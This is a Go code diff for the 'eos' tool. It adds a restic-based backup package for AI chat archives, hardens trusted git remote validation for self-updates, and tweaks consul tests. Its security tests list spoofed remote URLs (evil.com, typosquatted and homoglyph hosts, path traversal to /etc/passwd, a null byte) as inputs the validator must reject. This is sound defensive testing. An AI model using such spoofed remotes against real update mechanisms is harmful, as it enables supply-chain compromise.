+ logger.Info("Running chat archive prune",
+ zap.String("repo", repoPath),
+ zap.String("keep_within", config.Retention.KeepWithin),
+ zap.Int("keep_hourly", config.Retention.KeepHourly),
+ zap.Int("keep_daily", config.Retention.KeepDaily))
+
+ if config.DryRun {
+ logger.Info("DRY RUN: Would prune with retention policy",
+ zap.String("keep_within", config.Retention.KeepWithin))
+ return nil
+ }
+
+ if err := checkRepoInitialized(rc.Ctx, repoPath, passwordFile); err != nil {
+ return fmt.Errorf("%w at %s: %v\n"+
+ "Run 'eos backup chats --setup' to initialize", ErrRepositoryNotInitialized, repoPath, err)
+ }
+
+ args := []string{
+ "-r", repoPath,
+ "--password-file", passwordFile,
+ "forget",
+ "--tag", BackupTag,
+ "--keep-within", config.Retention.KeepWithin,
+ "--keep-hourly", fmt.Sprintf("%d", config.Retention.KeepHourly),
+ "--keep-daily", fmt.Sprintf("%d", config.Retention.KeepDaily),
+ "--keep-weekly", fmt.Sprintf("%d", config.Retention.KeepWeekly),
+ "--keep-monthly", fmt.Sprintf("%d", config.Retention.KeepMonthly),
+ "--prune",
+ }
+
+ pruneCtx, cancel := context.WithTimeout(rc.Ctx, PruneTimeout)
+ defer cancel()
+
+ cmd := exec.CommandContext(pruneCtx, "restic", args...)
+ output, err := cmd.CombinedOutput()
+ if err != nil {
+ if pruneCtx.Err() == context.DeadlineExceeded {
+ return fmt.Errorf("restic prune timed out after %s", PruneTimeout)
+ }
+ return fmt.Errorf("restic prune failed: %w\nOutput: %s", err, string(output))
+ }
+
+ logger.Info("Chat archive prune completed",
+ zap.String("output", string(output)))
+
+ return nil
+}
+
+// chownToUser changes ownership of a path to a user.
+func chownToUser(path, username string) error {
+ cmd := exec.Command("chown", "-R", username+":"+username, path)
+ return cmd.Run()
+}
+
+func shellQuote(s string) string {
+ if s == "" {
+ return "''"
+ }
+ return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
+}
diff --git a/pkg/chatbackup/test_helpers_test.go b/pkg/chatbackup/test_helpers_test.go
new file mode 100644
index 000000000..ff9f200af
--- /dev/null
+++ b/pkg/chatbackup/test_helpers_test.go
@@ -0,0 +1,13 @@
+package chatbackup
+
+import (
+ "context"
+
+ "github.com/uptrace/opentelemetry-go-extra/otelzap"
+ "go.uber.org/zap"
+)
+
+// newSilentLogger creates a no-op logger for tests that don't need output.
+func newSilentLogger() otelzap.LoggerWithCtx {
+ return otelzap.New(zap.NewNop()).Ctx(context.Background())
+}
diff --git a/pkg/chatbackup/types.go b/pkg/chatbackup/types.go
new file mode 100644
index 000000000..634b0d4a8
--- /dev/null
+++ b/pkg/chatbackup/types.go
@@ -0,0 +1,206 @@
+// pkg/chatbackup/types.go
+// Types for machine-wide AI chat and context backup
+//
+// RATIONALE: Declarative registry of AI tools and their data locations
+// enables extensible, testable backup without hardcoded paths scattered
+// across shell scripts.
+
+package chatbackup
+
+// ToolSource represents an AI coding tool whose data we back up.
+// Each tool declares where its data lives and what patterns to include.
+type ToolSource struct {
+ // Name is a human-readable identifier (e.g., "claude-code")
+ Name string
+
+ // Description explains what this tool is
+ Description string
+
+ // Paths are directories or files to back up, relative to the scan root.
+ // Supports:
+ // - Absolute paths (e.g., "/home/henry/.claude/projects")
+ // - Home-relative with ~ (e.g., "~/.claude/projects")
+ // - Glob-relative patterns resolved at runtime
+ Paths []SourcePath
+}
+
+// SourcePath describes a single backup path with include/exclude patterns.
+type SourcePath struct {
+ // Path is the directory or file to back up
+ // Supports ~ for home directory expansion
+ Path string
+
+ // Includes are glob patterns to include (empty = everything)
+ Includes []string
+
+ // Excludes are glob patterns to exclude
+ Excludes []string
+
+ // Description explains what this path contains
+ Description string
+}
+
+// RetentionPolicy configures how long to keep snapshots.
+type RetentionPolicy struct {
+ // KeepWithin keeps ALL snapshots within this duration (e.g., "48h")
+ KeepWithin string
+
+ // KeepHourly keeps N hourly snapshots after KeepWithin period
+ KeepHourly int
+
+ // KeepDaily keeps N daily snapshots
+ KeepDaily int
+
+ // KeepWeekly keeps N weekly snapshots
+ KeepWeekly int
+
+ // KeepMonthly keeps N monthly snapshots
+ KeepMonthly int
+}
+
+// DefaultRetentionPolicy returns sensible defaults for chat backups.
+func DefaultRetentionPolicy() RetentionPolicy {
+ return RetentionPolicy{
+ KeepWithin: DefaultKeepWithin,
+ KeepHourly: DefaultKeepHourly,
+ KeepDaily: DefaultKeepDaily,
+ KeepWeekly: DefaultKeepWeekly,
+ KeepMonthly: DefaultKeepMonthly,
+ }
+}
+
+// BackupConfig holds configuration for a backup run.
+type BackupConfig struct {
+ // User is the user whose data to back up (defaults to current user)
+ User string
+
+ // HomeDir is resolved at runtime from User
+ HomeDir string
+
+ // ExtraScanDirs are additional directories to scan for project-level
+ // AI context files (CLAUDE.md, AGENTS.md, .claude/ dirs)
+ // Default: ["/opt"]
+ ExtraScanDirs []string
+
+ // Retention configures snapshot retention policy
+ Retention RetentionPolicy
+
+ // DryRun shows what would be done without making changes
+ DryRun bool
+
+ // Verbose enables detailed logging of each path scanned
+ Verbose bool
+}
+
+// DefaultBackupConfig returns sensible defaults.
+func DefaultBackupConfig() BackupConfig {
+ return BackupConfig{
+ ExtraScanDirs: []string{"/opt"},
+ Retention: DefaultRetentionPolicy(),
+ }
+}
+
+// ScheduleConfig holds configuration for scheduled backups.
+type ScheduleConfig struct {
+ // BackupConfig embeds the backup configuration
+ BackupConfig
+
+ // BackupCron is the cron schedule for backups (default: hourly)
+ BackupCron string
+
+ // PruneCron is the cron schedule for pruning (default: daily 3:05am)
+ PruneCron string
+}
+
+// DefaultScheduleConfig returns sensible defaults.
+func DefaultScheduleConfig() ScheduleConfig {
+ return ScheduleConfig{
+ BackupConfig: DefaultBackupConfig(),
+ BackupCron: DefaultBackupCron,
+ PruneCron: DefaultPruneCron,
+ }
+}
+
+// BackupResult holds the result of a backup run.
+type BackupResult struct {
+ // SnapshotID is the restic snapshot ID created
+ SnapshotID string
+
+ // PathsBackedUp lists the paths that were included
+ PathsBackedUp []string
+
+ // PathsSkipped lists paths that were not found
+ PathsSkipped []string
+
+ // FilesNew is the count of new files in this snapshot
+ FilesNew int
+
+ // FilesChanged is the count of changed files
+ FilesChanged int
+
+ // FilesUnmodified is the count of unchanged files
+ FilesUnmodified int
+
+ // BytesAdded is the number of new bytes added to the repo
+ BytesAdded int64
+
+ // TotalDuration is how long the backup took
+ TotalDuration string
+
+ // ToolsFound lists which AI tools had data to back up
+ ToolsFound []string
+}
+
+// ScheduleResult holds the result of schedule setup.
+type ScheduleResult struct {
+ // CronConfigured indicates if cron was set up
+ CronConfigured bool
+
+ // BackupCron is the backup cron expression
+ BackupCron string
+
+ // PruneCron is the prune cron expression
+ PruneCron string
+
+ // RepoPath is the restic repository path
+ RepoPath string
+
+ // PasswordFile is the path to the password file
+ PasswordFile string
+
+ // PasswordGenerated is true if a new password was created
+ PasswordGenerated bool
+
+ // Warnings contains non-fatal issues
+ Warnings []string
+}
+
+// BackupStatus tracks backup health for monitoring/alerting.
+type BackupStatus struct {
+ // LastSuccess is the RFC3339 timestamp of last successful backup
+ LastSuccess string `json:"last_success,omitempty"`
+
+ // LastFailure is the RFC3339 timestamp of last failed backup
+ LastFailure string `json:"last_failure,omitempty"`
+
+ // LastSnapshotID is the ID of the most recent snapshot
+ LastSnapshotID string `json:"last_snapshot_id,omitempty"`
+
+ // BytesAdded is bytes added in last backup
+ BytesAdded int64 `json:"bytes_added,omitempty"`
+
+ // TotalSnapshots is the current snapshot count
+ TotalSnapshots int `json:"total_snapshots,omitempty"`
+
+ // SuccessCount is cumulative successful backups
+ SuccessCount int `json:"success_count"`
+
+ // FailureCount is cumulative failed backups
+ FailureCount int `json:"failure_count"`
+
+ // FirstBackup is the RFC3339 timestamp of first successful backup
+ FirstBackup string `json:"first_backup,omitempty"`
+
+ // ToolsFound lists AI tools discovered in last run
+ ToolsFound []string `json:"tools_found,omitempty"`
+}
diff --git a/pkg/chatbackup/types_test.go b/pkg/chatbackup/types_test.go
new file mode 100644
index 000000000..5162b4e98
--- /dev/null
+++ b/pkg/chatbackup/types_test.go
@@ -0,0 +1,113 @@
+package chatbackup
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+// ═══════════════════════════════════════════════════════════════════════════
+// RetentionPolicy Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDefaultRetentionPolicy_Values(t *testing.T) {
+ policy := DefaultRetentionPolicy()
+
+ assert.Equal(t, DefaultKeepWithin, policy.KeepWithin,
+ "KeepWithin should match constant")
+ assert.Equal(t, DefaultKeepHourly, policy.KeepHourly,
+ "KeepHourly should match constant")
+ assert.Equal(t, DefaultKeepDaily, policy.KeepDaily,
+ "KeepDaily should match constant")
+ assert.Equal(t, DefaultKeepWeekly, policy.KeepWeekly,
+ "KeepWeekly should match constant")
+ assert.Equal(t, DefaultKeepMonthly, policy.KeepMonthly,
+ "KeepMonthly should match constant")
+}
+
+func TestDefaultRetentionPolicy_SensibleDefaults(t *testing.T) {
+ policy := DefaultRetentionPolicy()
+
+ // RATIONALE: Retention should be generous enough to recover from mistakes
+ // but not so generous it wastes disk space
+ assert.NotEmpty(t, policy.KeepWithin,
+ "KeepWithin must not be empty")
+ assert.Greater(t, policy.KeepHourly, 0,
+ "KeepHourly must be positive")
+ assert.Greater(t, policy.KeepDaily, 0,
+ "KeepDaily must be positive")
+ assert.Greater(t, policy.KeepWeekly, 0,
+ "KeepWeekly must be positive")
+ assert.Greater(t, policy.KeepMonthly, 0,
+ "KeepMonthly must be positive")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// BackupConfig Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDefaultBackupConfig_Values(t *testing.T) {
+ config := DefaultBackupConfig()
+
+ assert.Equal(t, []string{"/opt"}, config.ExtraScanDirs,
+ "ExtraScanDirs should default to /opt")
+ assert.Equal(t, DefaultRetentionPolicy(), config.Retention,
+ "Retention should use default policy")
+ assert.False(t, config.DryRun,
+ "DryRun should default to false")
+ assert.False(t, config.Verbose,
+ "Verbose should default to false")
+}
+
+func TestDefaultBackupConfig_ExtraScanDirs(t *testing.T) {
+ config := DefaultBackupConfig()
+
+ // RATIONALE: /opt is where Eos deploys projects with CLAUDE.md
+ assert.Contains(t, config.ExtraScanDirs, "/opt",
+ "default scan dirs must include /opt")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// ScheduleConfig Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestDefaultScheduleConfig_Values(t *testing.T) {
+ config := DefaultScheduleConfig()
+
+ assert.Equal(t, DefaultBackupCron, config.BackupCron,
+ "BackupCron should match constant")
+ assert.Equal(t, DefaultPruneCron, config.PruneCron,
+ "PruneCron should match constant")
+ assert.Equal(t, DefaultBackupConfig(), config.BackupConfig,
+ "BackupConfig should use defaults")
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// BackupStatus Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestBackupStatus_ZeroValue(t *testing.T) {
+ status := BackupStatus{}
+
+ // Zero value should be safe to use
+ assert.Empty(t, status.LastSuccess)
+ assert.Empty(t, status.LastFailure)
+ assert.Empty(t, status.LastSnapshotID)
+ assert.Equal(t, int64(0), status.BytesAdded)
+ assert.Equal(t, 0, status.TotalSnapshots)
+ assert.Equal(t, 0, status.SuccessCount)
+ assert.Equal(t, 0, status.FailureCount)
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// BackupResult Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+func TestBackupResult_ZeroValue(t *testing.T) {
+ result := BackupResult{}
+
+ // Zero value should be safe to use
+ assert.Empty(t, result.SnapshotID)
+ assert.Nil(t, result.PathsBackedUp)
+ assert.Nil(t, result.ToolsFound)
+}
diff --git a/pkg/constants/security.go b/pkg/constants/security.go
index 4e4ecf487..17fc261bb 100644
--- a/pkg/constants/security.go
+++ b/pkg/constants/security.go
@@ -1,28 +1,49 @@
-// pkg/constants/security.go
-//
-// Security constants for Eos - trusted sources and verification settings
-// CRITICAL: These constants protect against supply chain attacks
-
+// Package constants provides security-critical constants for Eos, including
+// trusted git remote definitions, GPG verification settings, and URL parsing.
+// CRITICAL: These constants protect against supply chain attacks.
package constants
-import "strings"
+import (
+ "net/url"
+ "strings"
+)
// TrustedGitRemotes defines the only acceptable git remote URLs for eos updates
// SECURITY: Only these remotes are trusted for self-update operations
// Any other remote will be REJECTED to prevent malicious code injection
-const (
- // PrimaryRemoteHTTPS is the primary HTTPS remote
- PrimaryRemoteHTTPS = "https://github.com/CodeMonkeyCybersecurity/eos.git"
- // PrimaryRemoteSSH is the primary SSH remote
- PrimaryRemoteSSH = "git@github.com:CodeMonkeyCybersecurity/eos.git"
-)
+// TrustedHosts lists the hostnames trusted to serve Eos source code.
+// SECURITY CRITICAL: Only modify this list after security review.
+// Matching is case-insensitive and ignores port numbers so that
+// ssh://git@gitea.cybermonkey.sh:9001/... and https://gitea.cybermonkey.sh/...
+// both resolve to the same trusted host.
+var TrustedHosts = []string{
+ "github.com",
+ "gitea.cybermonkey.sh",
+}
+
+// TrustedRepoPaths lists the allowed org/repo path suffixes.
+// The comparison strips a trailing ".git" and is case-insensitive.
+var TrustedRepoPaths = []string{
+ "codemonkeycybersecurity/eos",
+ "cybermonkey/eos",
+}
+
+// PrimaryRemoteHTTPS is the canonical Gitea HTTPS remote.
+const PrimaryRemoteHTTPS = "https://gitea.cybermonkey.sh/cybermonkey/eos.git"
-// TrustedRemotes is the whitelist of acceptable git remotes
-// SECURITY CRITICAL: Only modify this list after security review
+// PrimaryRemoteSSH is the canonical Gitea SSH remote.
+const PrimaryRemoteSSH = "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git"
+
+// TrustedRemotes is the explicit whitelist of acceptable git remotes for
+// display in error messages. IsTrustedRemote uses host+path matching, so
+// this slice is only used for human-readable output.
var TrustedRemotes = []string{
PrimaryRemoteHTTPS,
PrimaryRemoteSSH,
+ "git@gitea.cybermonkey.sh:cybermonkey/eos.git",
+ "https://github.com/CodeMonkeyCybersecurity/eos.git",
+ "git@github.com:CodeMonkeyCybersecurity/eos.git",
}
// GPGVerificationSettings controls GPG signature verification
@@ -48,12 +69,82 @@ var DefaultGPGSettings = GPGVerificationSettings{
WarnIfNotSigned: true, // Warn users about unsigned commits
}
-// IsTrustedRemote checks if a remote URL is in the trusted whitelist
-// NOTE: GitHub URLs are case-insensitive for org/repo names, so we compare
-// case-insensitively to accept both "Eos" and "eos" as valid
+// NormalizeRemoteURL strips a trailing ".git" suffix and lowercases the
+// string so that equivalent remote URLs compare equal.
+func NormalizeRemoteURL(raw string) string {
+ s := strings.TrimSpace(raw)
+ s = strings.TrimSuffix(s, ".git")
+ return strings.ToLower(s)
+}
+
+// ParseRemoteHostPath extracts the host (without port) and the repo path
+// from a git remote URL. Supports HTTPS, SSH (ssh://...) and SCP-style
+// (git@host:path) formats.
+//
+// Returns (host, path, ok). path is returned without a leading "/" and
+// without a trailing ".git".
+func ParseRemoteHostPath(raw string) (host string, repoPath string, ok bool) {
+ raw = strings.TrimSpace(raw)
+ if raw == "" {
+ return "", "", false
+ }
+
+ // SCP-style: git@host:org/repo.git
+ if idx := strings.Index(raw, "@"); idx >= 0 && !strings.Contains(raw, "://") {
+ afterAt := raw[idx+1:]
+ colonIdx := strings.Index(afterAt, ":")
+ if colonIdx < 0 {
+ return "", "", false
+ }
+ host = strings.ToLower(afterAt[:colonIdx])
+ repoPath = strings.TrimPrefix(afterAt[colonIdx+1:], "/")
+ repoPath = strings.TrimSuffix(repoPath, ".git")
+ repoPath = strings.ToLower(repoPath)
+ return host, repoPath, true
+ }
+
+ // URL-style: https://host/org/repo.git or ssh://git@host:port/org/repo.git
+ u, err := url.Parse(raw)
+ if err != nil || u.Host == "" {
+ return "", "", false
+ }
+
+ host = strings.ToLower(u.Hostname()) // strips port
+ repoPath = strings.TrimPrefix(u.Path, "/")
+ repoPath = strings.TrimSuffix(repoPath, ".git")
+ repoPath = strings.ToLower(repoPath)
+ return host, repoPath, true
+}
+
+// IsTrustedRemote checks if a remote URL resolves to a trusted host
+// serving the Eos repository. It matches on host (case-insensitive,
+// port-stripped) and repo path (case-insensitive, .git-stripped).
func IsTrustedRemote(remoteURL string) bool {
+ normalized := NormalizeRemoteURL(remoteURL)
for _, trusted := range TrustedRemotes {
- if strings.EqualFold(remoteURL, trusted) {
+ if normalized == NormalizeRemoteURL(trusted) {
+ return true
+ }
+ }
+
+ host, repoPath, ok := ParseRemoteHostPath(remoteURL)
+ if !ok {
+ return false
+ }
+
+ hostTrusted := false
+ for _, h := range TrustedHosts {
+ if host == strings.ToLower(h) {
+ hostTrusted = true
+ break
+ }
+ }
+ if !hostTrusted {
+ return false
+ }
+
+ for _, p := range TrustedRepoPaths {
+ if repoPath == strings.ToLower(p) {
return true
}
}
diff --git a/pkg/constants/security_test.go b/pkg/constants/security_test.go
new file mode 100644
index 000000000..e99765e6e
--- /dev/null
+++ b/pkg/constants/security_test.go
@@ -0,0 +1,338 @@
+// pkg/constants/security_test.go
+//
+// Tests for trusted remote validation - security-critical code.
+// Covers: IsTrustedRemote, ParseRemoteHostPath, NormalizeRemoteURL
+
+package constants
+
+import (
+ "testing"
+)
+
+// --- Unit tests: ParseRemoteHostPath ---
+
+func TestParseRemoteHostPath(t *testing.T) {
+ tests := []struct {
+ name string
+ raw string
+ wantHost string
+ wantPath string
+ wantOK bool
+ }{
+ // HTTPS URLs
+ {
+ name: "gitea https with .git",
+ raw: "https://gitea.cybermonkey.sh/cybermonkey/eos.git",
+ wantHost: "gitea.cybermonkey.sh",
+ wantPath: "cybermonkey/eos",
+ wantOK: true,
+ },
+ {
+ name: "gitea https without .git",
+ raw: "https://gitea.cybermonkey.sh/cybermonkey/eos",
+ wantHost: "gitea.cybermonkey.sh",
+ wantPath: "cybermonkey/eos",
+ wantOK: true,
+ },
+ {
+ name: "github https with .git",
+ raw: "https://github.com/CodeMonkeyCybersecurity/eos.git",
+ wantHost: "github.com",
+ wantPath: "codemonkeycybersecurity/eos",
+ wantOK: true,
+ },
+ {
+ name: "github https without .git",
+ raw: "https://github.com/CodeMonkeyCybersecurity/eos",
+ wantHost: "github.com",
+ wantPath: "codemonkeycybersecurity/eos",
+ wantOK: true,
+ },
+ {
+ name: "github https mixed case",
+ raw: "https://GitHub.com/CodeMonkeyCybersecurity/Eos.git",
+ wantHost: "github.com",
+ wantPath: "codemonkeycybersecurity/eos",
+ wantOK: true,
+ },
+
+ // SSH URLs (ssh:// scheme)
+ {
+ name: "gitea ssh with port",
+ raw: "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git",
+ wantHost: "gitea.cybermonkey.sh",
+ wantPath: "cybermonkey/eos",
+ wantOK: true,
+ },
+ {
+ name: "gitea ssh without port",
+ raw: "ssh://git@gitea.cybermonkey.sh/cybermonkey/eos.git",
+ wantHost: "gitea.cybermonkey.sh",
+ wantPath: "cybermonkey/eos",
+ wantOK: true,
+ },
+ {
+ name: "vhost7 ssh with port",
+ raw: "ssh://git@vhost7:9001/cybermonkey/eos.git",
+ wantHost: "vhost7",
+ wantPath: "cybermonkey/eos",
+ wantOK: true,
+ },
+
+ // SCP-style (git@host:path)
+ {
+ name: "github scp style",
+ raw: "git@github.com:CodeMonkeyCybersecurity/eos.git",
+ wantHost: "github.com",
+ wantPath: "codemonkeycybersecurity/eos",
+ wantOK: true,
+ },
+ {
+ name: "gitea scp style",
+ raw: "git@gitea.cybermonkey.sh:cybermonkey/eos.git",
+ wantHost: "gitea.cybermonkey.sh",
+ wantPath: "cybermonkey/eos",
+ wantOK: true,
+ },
+ {
+ name: "scp style without .git",
+ raw: "git@github.com:CodeMonkeyCybersecurity/eos",
+ wantHost: "github.com",
+ wantPath: "codemonkeycybersecurity/eos",
+ wantOK: true,
+ },
+
+ // Edge cases
+ {
+ name: "empty string",
+ raw: "",
+ wantOK: false,
+ },
+ {
+ name: "whitespace only",
+ raw: " ",
+ wantOK: false,
+ },
+ {
+ name: "trailing whitespace",
+ raw: " https://github.com/CodeMonkeyCybersecurity/eos.git ",
+ wantHost: "github.com",
+ wantPath: "codemonkeycybersecurity/eos",
+ wantOK: true,
+ },
+ {
+ name: "bare path (no scheme, no @)",
+ raw: "/cybermonkey/eos.git",
+ wantOK: false,
+ },
+ {
+ name: "scp style missing colon",
+ raw: "git@github.com/CodeMonkeyCybersecurity/eos.git",
+ wantOK: false,
+ },
+ }
+
+ for _, tt := range tests {
+ t.Run(tt.name, func(t *testing.T) {
+ host, path, ok := ParseRemoteHostPath(tt.raw)
+ if ok != tt.wantOK {
+ t.Fatalf("ParseRemoteHostPath(%q) ok = %v, want %v", tt.raw, ok, tt.wantOK)
+ }
+ if !tt.wantOK {
+ return
+ }
+ if host != tt.wantHost {
+ t.Errorf("host = %q, want %q", host, tt.wantHost)
+ }
+ if path != tt.wantPath {
+ t.Errorf("path = %q, want %q", path, tt.wantPath)
+ }
+ })
+ }
+}
+
+// --- Unit tests: NormalizeRemoteURL ---
+
+func TestNormalizeRemoteURL(t *testing.T) {
+ tests := []struct {
+ raw string
+ want string
+ }{
+ {"https://GitHub.com/Org/Repo.git", "https://github.com/org/repo"},
+ {"https://github.com/org/repo", "https://github.com/org/repo"},
+ {" https://github.com/org/repo.git ", "https://github.com/org/repo"},
+ {"git@github.com:Org/Repo.git", "git@github.com:org/repo"},
+ {"", ""},
+ }
+ for _, tt := range tests {
+ t.Run(tt.raw, func(t *testing.T) {
+ got := NormalizeRemoteURL(tt.raw)
+ if got != tt.want {
+ t.Errorf("NormalizeRemoteURL(%q) = %q, want %q", tt.raw, got, tt.want)
+ }
+ })
+ }
+}
+
+// --- Unit tests: IsTrustedRemote ---
+
+func TestIsTrustedRemote(t *testing.T) {
+ tests := []struct {
+ name string
+ remote string
+ trusted bool
+ }{
+ // Gitea HTTPS (canonical)
+ {"gitea https canonical", "https://gitea.cybermonkey.sh/cybermonkey/eos.git", true},
+ {"gitea https no .git", "https://gitea.cybermonkey.sh/cybermonkey/eos", true},
+ {"gitea https mixed case", "https://Gitea.Cybermonkey.SH/Cybermonkey/Eos.git", true},
+
+ // Gitea SSH
+ {"gitea ssh with port", "ssh://git@gitea.cybermonkey.sh:9001/cybermonkey/eos.git", true},
+ {"gitea ssh no port", "ssh://git@gitea.cybermonkey.sh/cybermonkey/eos.git", true},
+ {"gitea scp style", "git@gitea.cybermonkey.sh:cybermonkey/eos.git", true},
+
+ // GitHub HTTPS
+ {"github https canonical", "https://github.com/CodeMonkeyCybersecurity/eos.git", true},
+ {"github https no .git", "https://github.com/CodeMonkeyCybersecurity/eos", true},
+ {"github https lowercase", "https://github.com/codemonkeycybersecurity/eos.git", true},
+
+ // GitHub SSH
+ {"github scp style", "git@github.com:CodeMonkeyCybersecurity/eos.git", true},
+ {"github scp lowercase", "git@github.com:codemonkeycybersecurity/eos.git", true},
+
+ // Untrusted - wrong host
+ {"untrusted host", "https://evil.com/cybermonkey/eos.git", false},
+ {"untrusted host gitlab", "https://gitlab.com/cybermonkey/eos.git", false},
+ {"attacker typosquat", "https://gitea.cybermonkey.sh.evil.com/cybermonkey/eos.git", false},
+
+ // Untrusted - wrong path
+ {"wrong org on github", "https://github.com/evil/eos.git", false},
+ {"wrong repo on github", "https://github.com/CodeMonkeyCybersecurity/noteos.git", false},
+ {"wrong org on gitea", "https://gitea.cybermonkey.sh/evil/eos.git", false},
+ {"wrong repo on gitea", "https://gitea.cybermonkey.sh/cybermonkey/backdoor.git", false},
+
+ // Untrusted - garbage
+ {"empty", "", false},
+ {"random text", "not-a-url", false},
+ {"path only", "/cybermonkey/eos.git", false},
+ {"local bare path not explicitly trusted", "/tmp/eos-origin.git", false},
+
+ // vhost7 internal hostname - untrusted by default
+ {"vhost7 internal", "ssh://git@vhost7:9001/cybermonkey/eos.git", false},
+ }
+
+ for _, tt := range tests {
+ t.Run(tt.name, func(t *testing.T) {
+ got := IsTrustedRemote(tt.remote)
+ if got != tt.trusted {
+ t.Errorf("IsTrustedRemote(%q) = %v, want %v", tt.remote, got, tt.trusted)
+ }
+ })
+ }
+}
+
+func TestIsTrustedRemote_ExactWhitelistSupportsLocalPaths(t *testing.T) {
+ original := append([]string(nil), TrustedRemotes...)
+ TrustedRemotes = append(TrustedRemotes, "/tmp/eos-origin.git")
+ t.Cleanup(func() { TrustedRemotes = original })
+
+ if !IsTrustedRemote("/tmp/eos-origin.git") {
+ t.Fatal("expected exact TrustedRemotes whitelist entry to be trusted")
+ }
+}
+
+// --- Security tests ---
+
+func TestIsTrustedRemote_SecurityAttacks(t *testing.T) {
+ attacks := []struct {
+ name string
+ remote string
+ }{
+ {"path traversal", "https://gitea.cybermonkey.sh/../../../etc/passwd"},
+ {"null byte", "https://gitea.cybermonkey.sh/cybermonkey/eos\x00.git"},
+ {"unicode homoglyph", "https://gite\u0430.cybermonkey.sh/cybermonkey/eos.git"}, // Cyrillic 'a'
+ {"subdomain attack", "https://evil.gitea.cybermonkey.sh/cybermonkey/eos.git"},
+ {"port confusion", "https://gitea.cybermonkey.sh:443/cybermonkey/eos.git"},
+ }
+
+ // Expected results: most are false (attack blocked), but some are
+ // legitimately trusted (port confusion = same host with explicit port).
+ // %65 = 'e', so %65os == eos; url.Parse decodes it. This is correct
+ // behavior since git would fetch the same repo. Not an attack vector.
+ expectedTrusted := map[string]bool{
+ "port confusion": true, // trusted host, port stripped by url.Hostname()
+ }
+
+ for _, tt := range attacks {
+ t.Run(tt.name, func(t *testing.T) {
+ got := IsTrustedRemote(tt.remote)
+ want := expectedTrusted[tt.name]
+ if got != want {
+ if want {
+ t.Errorf("IsTrustedRemote(%q) = false, but should be trusted", tt.remote)
+ } else {
+ t.Errorf("SECURITY: IsTrustedRemote(%q) = true, want false (attack vector)", tt.remote)
+ }
+ }
+ })
+ }
+}
+
+// --- Integration-style: verify the actual constants are self-consistent ---
+
+func TestTrustedRemotesListedInConstants(t *testing.T) {
+ // Every entry in TrustedRemotes should pass IsTrustedRemote
+ for _, remote := range TrustedRemotes {
+ if !IsTrustedRemote(remote) {
+ t.Errorf("TrustedRemotes entry %q does not pass IsTrustedRemote", remote)
+ }
+ }
+}
+
+func TestPrimaryRemotesAreTrusted(t *testing.T) {
+ if !IsTrustedRemote(PrimaryRemoteHTTPS) {
+ t.Errorf("PrimaryRemoteHTTPS %q is not trusted", PrimaryRemoteHTTPS)
+ }
+ if !IsTrustedRemote(PrimaryRemoteSSH) {
+ t.Errorf("PrimaryRemoteSSH %q is not trusted", PrimaryRemoteSSH)
+ }
+}
+
+func TestTrustedHostsNotEmpty(t *testing.T) {
+ if len(TrustedHosts) == 0 {
+ t.Fatal("TrustedHosts is empty - no hosts would be trusted")
+ }
+}
+
+func TestTrustedRepoPathsNotEmpty(t *testing.T) {
+ if len(TrustedRepoPaths) == 0 {
+ t.Fatal("TrustedRepoPaths is empty - no repos would be trusted")
+ }
+}
+
+// --- Benchmark ---
+
+func BenchmarkIsTrustedRemote_Trusted(b *testing.B) {
+ for b.Loop() {
+ IsTrustedRemote("https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+ }
+}
+
+func BenchmarkIsTrustedRemote_Untrusted(b *testing.B) {
+ for b.Loop() {
+ IsTrustedRemote("https://evil.com/malicious/repo.git")
+ }
+}
+
+func BenchmarkParseRemoteHostPath_HTTPS(b *testing.B) {
+ for b.Loop() {
+ ParseRemoteHostPath("https://gitea.cybermonkey.sh/cybermonkey/eos.git")
+ }
+}
+
+func BenchmarkParseRemoteHostPath_SCP(b *testing.B) {
+ for b.Loop() {
+ ParseRemoteHostPath("git@github.com:CodeMonkeyCybersecurity/eos.git")
+ }
+}
diff --git a/pkg/consul/enhanced_integration_test.go b/pkg/consul/enhanced_integration_test.go
index 12a5ddcbb..0a7ae26cd 100644
--- a/pkg/consul/enhanced_integration_test.go
+++ b/pkg/consul/enhanced_integration_test.go
@@ -60,7 +60,7 @@ func TestAdvancedService_Creation(t *testing.T) {
Name: "test-service",
Tags: []string{"test", "api"},
Port: 8080,
- Address: "shared.GetInternalHostname",
+ Address: "127.0.0.1",
Meta: map[string]string{
"version": "1.0.0",
"env": "test",
@@ -70,7 +70,7 @@ func TestAdvancedService_Creation(t *testing.T) {
ID: "test-health-1",
Name: "HTTP Health Check",
Type: "http",
- Target: "http://shared.GetInternalHostname:8080/health",
+ Target: "http://127.0.0.1:8080/health",
Interval: "10s",
Timeout: "3s",
SuccessBeforePassing: 2,
diff --git a/pkg/consul/scripts/helper.go b/pkg/consul/scripts/helper.go
index 878889f25..b04de4d44 100644
--- a/pkg/consul/scripts/helper.go
+++ b/pkg/consul/scripts/helper.go
@@ -39,7 +39,7 @@ case "$1" in
discover)
echo "=== Discovering Vault via DNS ==="
- dig +short @shared.GetInternalHostname -p 8600 vault.service.consul 2>/dev/null || echo "DNS lookup failed"
+ dig +short @127.0.0.1 -p 8600 vault.service.consul 2>/dev/null || echo "DNS lookup failed"
echo -e "\n=== Discovering Vault via API ==="
curl -s $CONSUL_ADDR/v1/catalog/service/vault | jq -r '.[].ServiceAddress + ":" + (.[].ServicePort | tostring)' 2>/dev/null || echo "API lookup failed"
;;
diff --git a/pkg/consul/security_test.go b/pkg/consul/security_test.go
index 3e0f40b46..52d32bf82 100644
--- a/pkg/consul/security_test.go
+++ b/pkg/consul/security_test.go
@@ -99,7 +99,7 @@ func TestSecurityValidator_ValidateService(t *testing.T) {
Name: "secure-api",
Tags: []string{"api", "production"},
Port: 8443,
- Address: "shared.GetInternalHostname",
+ Address: "127.0.0.1",
Meta: map[string]string{
"version": "1.0.0",
"environment": "production",
